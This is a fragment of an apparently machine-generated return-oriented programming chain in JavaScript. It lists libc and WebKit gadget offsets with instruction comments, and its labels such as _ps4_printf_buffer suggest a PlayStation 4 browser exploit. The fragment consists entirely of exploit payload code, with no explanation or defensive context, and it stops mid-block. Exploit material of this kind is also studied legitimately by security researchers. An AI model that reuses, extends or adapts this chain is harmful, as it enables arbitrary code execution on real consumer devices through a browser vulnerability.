db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+573584, //L12739
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+573600, //L12740
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+573568, //L12738
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12738:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L12739:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12740:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+573760, //L12744
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+573728, //L12742
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+573744, //L12743
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12741:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L12742:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12743:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12744:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+573816, //L12746
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L12746:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+573944, //L12748
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+573960, //L12749
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+573928, //L12747
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12747:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L12748:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12749:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+574040, //L12750
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+574056, //L12751
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12750:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12751:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+574216, //L12755
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+574184, //L12753
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+574200, //L12754
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12752:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L12753:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12754:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12755:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+574272, //L12757
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L12757:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+574400, //L12759
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+574416, //L12760
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+574384, //L12758
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12758:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L12759:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12760:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+574512, //L12762
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+574496, //L12761
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12761:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12762:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+574648, //L12765
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+574616, //L12763
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12763:
db([0, 0]); // 0x0
set_gadgets([
libc_base+144605, //pop rdi
//L12764:
ropchain+128, //_ps4_printf_buffer
libc_base+759608 //pop rax
]);
//L12765:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+574792, //L12768
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+574760, //L12766
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+574776, //L12767
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12766:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12767:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12768:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+574880, //L12770
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L12769:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L12770:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+574928, //L12771
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12771:
db([0, 0]); // 0x0
set_gadgets([
libc_base+759608, //pop rax
//L12772:
ropchain+128, //_ps4_printf_buffer
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+575000, //L12774
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12774:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+575080, //L12776
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12776:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+575136, //L12777
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12777:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+575264, //L12780
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+575248, //L12779
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12779:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12780:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+575368, //L12781
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+575384, //L12782
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L12781:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12782:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+575504, //L12783
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+575488, //L12784
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L12784:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L12783:
db([0, 0]); // 0x0
//L12725:
set_gadget(libc_base+764760,); //pop rsi
db([208, 0]); // 0xd0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+144605, //pop rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+764760, //pop rsi
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+1438842, //pop rdx
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+763368, //pop rcx
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+568675, //pop r8
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+3236123, //pop r9
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+756281, //xor rax, rax
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+11, //nop
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+11, //nop
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+764760, //pop rsi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+763368, //pop rcx
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+144605, //pop rdi
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+568675, //pop r8
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+782311, //pop rsp
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([208, 0]); // 0xd0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967080, 4294967295]); // -0xd8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([200, 0]); // 0xc8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967088, 4294967295]); // -0xd0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([192, 0]); // 0xc0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967096, 4294967295]); // -0xc8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([184, 0]); // 0xb8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967104, 4294967295]); // -0xc0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([176, 0]); // 0xb0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967112, 4294967295]); // -0xb8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([168, 0]); // 0xa8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
webkit_base+14664103, //and rax, rcx
libc_base+763368, //pop rcx
write_addr,
webkit_base+20307877, //mov [rax], rcx
libc_base+764760 //pop rsi
]);
db([4294967192, 4294967295]); // -0x68
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760 //pop rsi
]);
db([48, 0]); // 0x30
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+731401, //mov rax, r8
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([32, 0]); // 0x20
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760 //pop rsi
]);
db([24, 0]); // 0x18
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([128, 0]); // 0x80
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+576832, //L12785
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+782311 //pop rsp
]);
//L12785:
db([0, 0]); // 0x0
//___bswap64_var:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+576904, //L12787
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L12787:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+577000, //L12788
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+577032, //L12791
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L12788:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12790:
db([16, 0]); // 0x10
set_gadget(webkit_base+568675,); //pop r8
//L12791:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+577136, //L12794
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+577120, //L12792
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12792:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12794:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+577248, //L12795
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+577280, //L12797
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+577264, //L12796
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12795:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12796:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12797:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+577384, //L12798
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+577400, //L12799
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L12798:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12799:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+577520, //L12800
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+577504, //L12801
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L12801:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L12800:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+577608, //L12803
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+577592, //L12802
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12802:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12803:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+577712, //L12804
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+577728, //L12805
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L12804:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12805:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+577848, //L12806
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+577832, //L12807
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L12807:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L12806:
db([0, 0]); // 0x0
//___bswap32_var:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+577920, //L12809
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L12809:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+578016, //L12810
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+578048, //L12813
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L12810:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12812:
db([16, 0]); // 0x10
set_gadget(webkit_base+568675,); //pop r8
//L12813:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+578152, //L12816
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+578136, //L12814
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12814:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12816:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+578328, //L12819
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+578344, //L12820
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+578296, //L12817
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+578312, //L12818
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12817:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L12818:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12819:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12820:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+578504, //L12824
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+578472, //L12822
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+578488, //L12823
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12821:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L12822:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12823:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12824:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+578624, //L12825
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+578656, //L12827
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+578640, //L12826
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12825:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12826:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12827:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+578760, //L12828
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+578776, //L12829
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L12828:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12829:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+578896, //L12830
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+578880, //L12831
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L12831:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L12830:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+578984, //L12833
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+578968, //L12832
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12832:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12833:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+579088, //L12834
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+579104, //L12835
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L12834:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12835:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+579224, //L12836
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+579208, //L12837
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L12837:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L12836:
db([0, 0]); // 0x0
//___bswap16_var:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+579296, //L12839
webkit_base+660161, //mov [rsi], rax ; mov al, 1
